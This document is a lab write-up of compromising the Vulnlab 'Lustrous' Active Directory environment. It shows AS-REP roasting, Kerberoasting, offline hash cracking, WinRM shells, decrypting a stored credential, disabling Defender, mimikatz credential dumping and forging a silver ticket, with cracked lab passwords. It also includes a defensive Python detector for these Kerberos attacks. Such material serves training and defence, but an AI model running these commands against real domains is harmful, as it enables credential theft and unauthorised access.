Here are my notes on the LUSTROUS box from Vulnlab.
LUSTROUS:
LUSDC: 10.10.232.181
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
|_banner: 220 Microsoft FTP Service
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21 11:50AM <DIR> transfer
| ftp-syst:
|_ SYST: Windows_NT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
ftp> cd ben.cox
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
12-26-21 11:51AM 2944 users.csv
226 Transfer complete.
ftp> clear
?Invalid command.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
12-26-21 11:51AM 2944 users.csv
226 Transfer complete.
ftp> get users.csv
local: users.csv remote: users.csv
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |*****| 2944 19.92 KiB/s 00:00 ETA
226 Transfer complete.
2944 bytes received in 00:00 (19.90 KiB/s)
ftp> cd ..
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
12-26-21 11:51AM <DIR> ben.cox
12-26-21 11:49AM <DIR> rachel.parker
12-26-21 11:49AM <DIR> tony.ward
12-26-21 11:50AM <DIR> wayne.taylor
226 Transfer complete.
ftp> cd rachel.parker
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> cd tony.ward
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> cd wayne.taylor
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
- users.csv is the interesting file.
- Anonymous FTP has read and write permission anywhere within the FTP directory.
Usernames:
ben.cox        # vulnerable to AS-REP roasting!
rachel.parker
tony.ward
wayne.taylor
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
# Nothing interesting; could be useful as a last resort for enumeration.
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
200 GET 334l 2089w 180418c http://10.10.232.181/iisstart.png
200 GET 32l 55w 703c http://10.10.232.181/
403 GET 29l 92w 1233c http://10.10.232.181/aspnet_client/
403 GET 29l 92w 1233c http://10.10.232.181/Aspnet_client/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.232.181
+ Target Hostname: 10.10.232.181
+ Target Port: 80
+ Start Time: 2024-02-26 10:58:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /idJqPlMR.: Retrieved x-aspnet-version header: 4.0.30319.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ 7703 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-02-26 11:16:55 (GMT-5) (1112 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# Just the default IIS server page, nothing interesting.
443/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
- LusDC.lustrous.vl is served on both 80 and 443.
- Requires credentials to log in.
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-02-26 15:07:32Z)
- NOPE.
- Useful for further enumeration.
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# sudo GetNPUsers.py -no-pass -dc-ip 10.10.232.181 -usersfile users.txt lustrous.vl/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
- ben.cox is vulnerable to AS-REP roasting! (The $krb5asrep$23$ prefix means the AS-REP came back RC4-encrypted, which is what makes it crackable offline.)
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt ben.cox_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trinity1 ($krb5asrep$23$ben.cox@LUSTROUS.VL)
1g 0:00:00:00 DONE (2024-02-26 11:58) 7.692g/s 456861p/s 456861c/s 456861C/s blueboy1..062906
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ben.cox:Trinity1
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# sudo rdate -n 10.10.232.181
Mon Feb 26 11:12:10 EST 2024
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# sudo impacket-GetUserSPNs 'lustrous.vl/ben.cox:Trinity1' -dc-ip 10.10.232.181 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName     Name     MemberOf  PasswordLastSet             LastLogon                   Delegation
-----------------------  -------  --------  --------------------------  --------------------------  ----------
http/lusdc               svc_web            2021-12-22 07:46:12.670282  2024-02-26 10:08:39.684455
http/lusdc.lustrous.vl   svc_web            2021-12-22 07:46:12.670282  2024-02-26 10:08:39.684455
MSSQL/lusdc              svc_db             2021-12-22 07:46:34.170590  <never>
MSSQL/lusdc.lustrous.vl  svc_db             2021-12-22 07:46:34.170590  <never>
[-] CCache file is not found. Skipping...
svc_web:iydgTvmujl6f
svc_db:[UNKNOWN] - did not crack with rockyou - NOPE!
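As an added defender-side example (not part of the original notes), these rules flag the AS-REP roast of ben.cox and the Kerberoast of svc_web/svc_db from constructed Security event 4768/4769 records, and audit the DONT_REQUIRE_PREAUTH bit that GetNPUsers.py reported; the event fields modelled, the sample records and the 10.8.0.71 source address are assumptions.

```python
"""Defender-side checks for the two attacks run against LUSDC above: AS-REP
roasting of ben.cox ($krb5asrep$23$...) and Kerberoasting of svc_web/svc_db
($krb5tgs$23$...). Both hashes carry etype 23, i.e. RC4-HMAC, which is the
signature these rules key on. All event records and account data below are
constructed for the example; they are not taken from real LUSDC logs."""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable

RC4_HMAC = 0x17                     # etype 23 in the $krb5asrep$23$ / $krb5tgs$23$ hashes
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the userAccountControl bit GetNPUsers.py reports on


@dataclass(frozen=True)
class KerbEvent:
    """Fields of Security events 4768 (TGT request) and 4769 (service ticket request)."""
    event_id: int
    account: str       # requesting account (Account Name)
    service: str       # 4768: 'krbtgt'; 4769: the service *account*, e.g. 'svc_web' or 'LUSDC$'
    etype: int         # Ticket Encryption Type
    preauth_type: int  # 4768 only: 0 means no pre-authentication was performed
    client_ip: str


def is_asrep_roast(ev: KerbEvent) -> bool:
    """A TGT issued with no pre-auth and an RC4-encrypted AS-REP: exactly what
    GetNPUsers.py obtained for ben.cox."""
    return ev.event_id == 4768 and ev.preauth_type == 0 and ev.etype == RC4_HMAC


def is_kerberoast(ev: KerbEvent) -> bool:
    """RC4 service ticket for a user (not machine) service account: what
    GetUserSPNs.py -request produced for svc_web and svc_db. Machine accounts
    (trailing '$') and the krbtgt TGT itself are excluded: their keys are random
    and not guessable, so an RC4 ticket for them is not a crack target."""
    return (ev.event_id == 4769 and ev.etype == RC4_HMAC
            and ev.service != "krbtgt" and not ev.service.endswith("$"))


def findings(events: Iterable[KerbEvent], burst_threshold: int = 2) -> list[str]:
    """Flag AS-REP roasts per event, and Kerberoasts per (account, ip) once the
    number of distinct service accounts requested with RC4 reaches the threshold:
    one RC4 ticket can be a legacy client, several in one session is roasting."""
    out = []
    rc4_tgs: dict[tuple[str, str], set[str]] = defaultdict(set)
    for ev in events:
        if is_asrep_roast(ev):
            out.append(f"AS-REP roast: {ev.account} from {ev.client_ip} (no pre-auth, RC4)")
        elif is_kerberoast(ev):
            rc4_tgs[(ev.account, ev.client_ip)].add(ev.service)
    for (account, ip), services in sorted(rc4_tgs.items()):
        if len(services) >= burst_threshold:
            out.append(f"Kerberoast: {account} from {ip} pulled RC4 tickets for "
                       + ", ".join(sorted(services)))
    return out


def preauth_disabled(users: Iterable[tuple[str, int]]) -> list[str]:
    """Audit side: accounts whose userAccountControl has DONT_REQUIRE_PREAUTH set.
    Clearing that bit (and giving service accounts AES-only keys or a gMSA) is
    the fix for what the notes above exploited."""
    return sorted(name for name, uac in users if uac & UF_DONT_REQUIRE_PREAUTH)


# Constructed sample data mirroring the session in the notes (attacker at 10.8.0.71).
SAMPLE_EVENTS = [
    KerbEvent(4768, "ben.cox",       "krbtgt",  RC4_HMAC, 0, "10.8.0.71"),      # GetNPUsers.py
    KerbEvent(4768, "rachel.parker", "krbtgt",  0x12,     2, "10.10.232.182"),  # normal AES logon
    KerbEvent(4769, "ben.cox",       "svc_web", RC4_HMAC, 0, "10.8.0.71"),      # GetUserSPNs -request
    KerbEvent(4769, "ben.cox",       "svc_db",  RC4_HMAC, 0, "10.8.0.71"),
    KerbEvent(4769, "ben.cox",       "LUSDC$",  0x12,     0, "10.8.0.71"),      # ordinary CIFS ticket
    KerbEvent(4769, "wayne.taylor",  "svc_web", RC4_HMAC, 0, "10.10.232.182"),  # single legacy request
]
SAMPLE_USERS = [
    ("ben.cox", 0x200 | UF_DONT_REQUIRE_PREAUTH),  # NORMAL_ACCOUNT + no pre-auth
    ("rachel.parker", 0x200), ("tony.ward", 0x200), ("wayne.taylor", 0x200),
]

if __name__ == "__main__":
    for line in findings(SAMPLE_EVENTS):
        print(line)
    print("pre-auth disabled:", preauth_disabled(SAMPLE_USERS))
```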
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/results/10.10.232.181/scans/tcp135]
└─# impacket-rpcdump @10.10.232.181 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
┌──(root㉿kali)-[/home/…/results/10.10.232.181/scans/tcp135]
└─# rpcclient --user="" --command=enumdomusers -N 10.10.232.181
result was NT_STATUS_ACCESS_DENIED
- ACCESS DENIED.
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
do_connect: Connection to 10.10.232.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
445/tcp open microsoft-ds? syn-ack ttl 127
┌──(root㉿kali)-[/home/…/results/10.10.232.181/scans/tcp445]
└─# smbclient -N -L 10.10.232.181 -U "Guest"
session setup failed: NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/…/results/10.10.232.181/scans/tcp445]
└─# smbclient -N -L 10.10.232.181 -U ""
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.232.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
- NOPE.
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# crackmapexec smb 10.10.232.181 -u ben.cox -p "Trinity1" --shares
SMB 10.10.232.181 445 LUSDC [*] Windows 10.0 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB 10.10.232.181 445 LUSDC [+] lustrous.vl\ben.cox:Trinity1
SMB 10.10.232.181 445 LUSDC [+] Enumerated shares
SMB 10.10.232.181 445 LUSDC Share Permissions Remark
SMB 10.10.232.181 445 LUSDC ----- ----------- ------
SMB 10.10.232.181 445 LUSDC ADMIN$ Remote Admin
SMB 10.10.232.181 445 LUSDC C$ Default share
SMB 10.10.232.181 445 LUSDC IPC$ READ Remote IPC
SMB 10.10.232.181 445 LUSDC NETLOGON READ Logon server share
SMB 10.10.232.181 445 LUSDC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# sudo lookupsid.py ben.cox@10.10.232.181 | tee usernames
Password:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.232.181
[*] StringBinding ncacn_np:10.10.232.181[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2355092754-1584501958-1513963426
# Extract just the usernames (DOMAIN\user -> user) from the lookupsid output:
grep SidTypeUser usernames | awk '{print $2}' | cut -d '\' -f2 > users2.txt
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/scans]
└─# ldapsearch -x -H ldap://10.10.232.181 -D '' -w '' -b "DC=lustrous,DC=vl"
# extended LDIF
#
# LDAPv3
# base <DC=lustrous,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
# LDAPv3: anonymous search is refused, a successful bind is required - NOPE!
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2024-02-26T15:09:17+00:00; -58m39s from scanner time.
| rdp-ntlm-info:
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
┌──(root㉿kali)-[/home/…/results/10.10.232.181/loot/BLOOD]
└─# crackmapexec winrm 10.10.232.181 -u ben.cox -p "Trinity1"
SMB 10.10.232.181 5985 LUSDC [*] Windows 10.0 Build 20348 (name:LUSDC) (domain:lustrous.vl)
HTTP 10.10.232.181 5985 LUSDC [*] http://10.10.232.181:5985/wsman
WINRM 10.10.232.181 5985 LUSDC [-] lustrous.vl\ben.cox:Trinity1
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
60215/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61854/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
61894/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Service Info: Host: LUSDC; OS: Windows; CPE: cpe:/o:microsoft:windows
LUSMS: 10.10.232.182
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
- ACCESS DENIED.
┌──(root㉿kali)-[/home/…/results/10.10.232.182/scans/tcp135]
└─# impacket-rpcdump @10.10.232.182 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
- Print spooler RPC interfaces (MS-RPRN/MS-PAR) are exposed: candidate for PrintNightmare (not tested here).
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
- NT_STATUS_ACCESS_DENIED
445/tcp open microsoft-ds? syn-ack ttl 127
┌──(root㉿kali)-[/home/…/results/10.10.232.182/scans/tcp445]
└─# smbclient -N -L 10.10.232.182
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/results/10.10.232.182/scans/tcp445]
└─# smbclient -N -L 10.10.232.182 -U ""
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/results/10.10.232.182/scans/tcp445]
└─# smbclient -N -L 10.10.232.182 -U "Guest"
session setup failed: NT_STATUS_LOGON_FAILURE
- No anonymous SMB access.
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# crackmapexec smb 10.10.232.182 -u svc_web -p "iydgTvmujl6f" --shares
SMB 10.10.232.182 445 LUSMS [*] Windows 10.0 Build 20348 x64 (name:LUSMS) (domain:lustrous.vl) (signing:False) (SMBv1:False)
SMB 10.10.232.182 445 LUSMS [+] lustrous.vl\svc_web:iydgTvmujl6f
SMB 10.10.232.182 445 LUSMS [+] Enumerated shares
SMB 10.10.232.182 445 LUSMS Share Permissions Remark
SMB 10.10.232.182 445 LUSMS ----- ----------- ------
SMB 10.10.232.182 445 LUSMS ADMIN$ Remote Admin
SMB 10.10.232.182 445 LUSMS C$ Default share
SMB 10.10.232.182 445 LUSMS IPC$ READ Remote IPC
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# crackmapexec smb 10.10.232.182 -u ben.cox -p "Trinity1" --shares
SMB 10.10.232.182 445 LUSMS [*] Windows 10.0 Build 20348 x64 (name:LUSMS) (domain:lustrous.vl) (signing:False) (SMBv1:False)
SMB 10.10.232.182 445 LUSMS [+] lustrous.vl\ben.cox:Trinity1
SMB 10.10.232.182 445 LUSMS [+] Enumerated shares
SMB 10.10.232.182 445 LUSMS Share Permissions Remark
SMB 10.10.232.182 445 LUSMS ----- ----------- ------
SMB 10.10.232.182 445 LUSMS ADMIN$ Remote Admin
SMB 10.10.232.182 445 LUSMS C$ Default share
SMB 10.10.232.182 445 LUSMS IPC$ READ Remote IPC
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2024-02-26T15:14:02+00:00; -58m39s from scanner time.
| rdp-ntlm-info:
| Target_Name: LUSTROUS
| NetBIOS_Domain_Name: LUSTROUS
| NetBIOS_Computer_Name: LUSMS
| DNS_Domain_Name: lustrous.vl
| DNS_Computer_Name: LusMS.lustrous.vl
| DNS_Tree_Name: lustrous.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-02-26T15:13:22+00:00
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
| Issuer: commonName=LusMS.lustrous.vl
| compressors:
| NULL
| cipher preference: server
| warnings:
| 64-bit block cipher 3DES vulnerable to SWEET32 attack
|_ least strength: C
| rdp-ntlm-info:
| Target_Name: LUSTROUS
| NetBIOS_Domain_Name: LUSTROUS
| NetBIOS_Computer_Name: LUSMS
| DNS_Domain_Name: lustrous.vl
| DNS_Computer_Name: LusMS.lustrous.vl
| DNS_Tree_Name: lustrous.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-02-26T14:59:31+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
┌──(root㉿kali)-[/home/…/results/10.10.232.181/loot/BLOOD]
└─# crackmapexec winrm 10.10.232.182 -u ben.cox -p "Trinity1"
SMB 10.10.232.182 5985 LUSMS [*] Windows 10.0 Build 20348 (name:LUSMS) (domain:lustrous.vl)
HTTP 10.10.232.182 5985 LUSMS [*] http://10.10.232.182:5985/wsman
WINRM 10.10.232.182 5985 LUSMS [+] lustrous.vl\ben.cox:Trinity1 (Pwn3d!)
# Because the user is in a remote-access group.
- USER SHELL!
# NO USER FLAG THOUGH!
PRIV ESC:
┌──(root㉿kali)-[/home/…/results/10.10.232.181/loot/BLOOD]
└─# evil-winrm -i 10.10.232.182 -u ben.cox -p 'Trinity1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ben.cox\Documents> whoami
lustrous\ben.cox
*Evil-WinRM* PS C:\Users\ben.cox\Documents>
*Evil-WinRM* PS C:\Users\ben.cox\Documents> dir
*Evil-WinRM* PS C:\Users\ben.cox\Documents> cd ..
*Evil-WinRM* PS C:\Users\ben.cox> cd Desktop
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> dir
Directory: C:\Users\ben.cox\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2021 10:30 AM 1652 admin.xml
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>
*Evil-WinRM* PS C:\Users\ben.cox> cd Desktop
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> download admin.xml
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# evil-winrm -i 10.10.232.182 -u ben.cox -p 'Trinity1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ben.cox\Documents> cd ..
*Evil-WinRM* PS C:\Users\ben.cox> cd Desktop
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> dir
Directory: C:\Users\ben.cox\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/26/2021 10:30 AM 1652 admin.xml
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Credential = Import-Clixml -Path "admin.xml"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Credential.GetNetworkCredential().password
XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> exit
Info: Exiting with code 0
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# crackmapexec winrm 10.10.232.182 -u administrator -p "XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF" --local-auth
SMB 10.10.232.182 5985 LUSMS [*] Windows 10.0 Build 20348 (name:LUSMS) (domain:LUSMS)
HTTP 10.10.232.182 5985 LUSMS [*] http://10.10.232.182:5985/wsman
WINRM 10.10.232.182 5985 LUSMS [+] LUSMS\administrator:XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF (Pwn3d!)
- ADMIN SHELL! (Local Administrator on LUSMS, hence --local-auth.) admin.xml was written with Export-Clixml, which wraps the PSCredential password with DPAPI for the exporting user; that is why Import-Clixml recovers the plaintext only in ben.cox's own session on that host, and why such files are worth hunting for in user profiles.
┌──(root㉿kali)-[/home/…/LUSTROUS/results/10.10.232.181/loot]
└─# evil-winrm -i 10.10.232.182 -u administrator -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/27/2021 1:26 PM 36 flag.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
USER_FLAG.TXT: VL{REDIRECTED}
POST-EXPLOITATION:
Set-MpPreference -DisableRealtimeMonitoring $true
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "vault::cred /patch" "exit"'
# No mimikatz.
HTTP Silver Ticket:
Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /user:tony.ward" "exit"'
# Not for a shell or RCE, but useful for further enumeration (finding credentials in pages or hidden folders) and for lateral movement.
# The ticket is forged with the RC4 key of the account that holds the http/lusdc SPN (svc_web, per GetUserSPNs above), so the KDC is never contacted: nothing shows up in 4768/4769, and the lifetime is whatever the forger picks (ten years in the klist output further down), which is the tell a defender can look for in 4624 logon data.
https://www.vuln.dev/2021/12/27/lab-lustrous-walkthrough/
https://medium.com/@thebinary0x1/lustrous-vulnlab-walkthrough-f314f8b86134
How Attackers Use Kerberos Silver Tickets to Exploit Systems
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
iwr http://lusdc.lustrous.vl -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
<li><a href="/Internal">Notes</a></li>
iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
<p>Welcome, LUSTROUS\LUSMS$!</p>
Template from the ired.team reference above (its own lab domain, offense.local):
mimikatz # kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:dc-mantvydas.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin
Adapted for LUSTROUS:
mimikatz # kerberos::golden /domain:lustrous.vl /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /user:tony.ward /target:LusDC.lustrous.vl /id:1114 /service:http/lusdc.lustrous.vl /ptt
Invoke-Mimikatz -Command '"kerberos::golden /domain:lustrous.vl /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /user:tony.ward /target:LusDC.lustrous.vl /id:1114 /service:http/lusdc.lustrous.vl /ptt" "exit"'
PS C:\Users\Administrator> Invoke-Mimikatz -Command '"kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /user:tony.ward" "exit"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /user:tony.ward
User : tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
User Id : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service : http
Target : lusdc.lustrous.vl
Lifetime : 2/26/2024 6:16:25 PM ; 2/23/2034 6:16:25 PM ; 2/23/2034 6:16:25 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session
PS C:\Users\Administrator> klist
Current LogonId is 0:0x3e7
Cached Tickets: (1)
#0> Client: tony.ward @ lustrous.vl
Server: http/lusdc.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 2/26/2024 18:16:25 (local)
End Time: 2/23/2034 18:16:25 (local)
Renew Time: 2/23/2034 18:16:25 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
Relevant row of the /Internal notes table, fetched with the forged tony.ward ticket:
</thead>
<tbody>
<tr>
<td>4</td>
<td>Password Reminder</td>
<td>U_cPVQqEI50i1X</td>
<td>lustrous_tony.ward</td>
<td><a class="btn btn-danger" href="/Internal/DeleteNote/4">Delete</a>
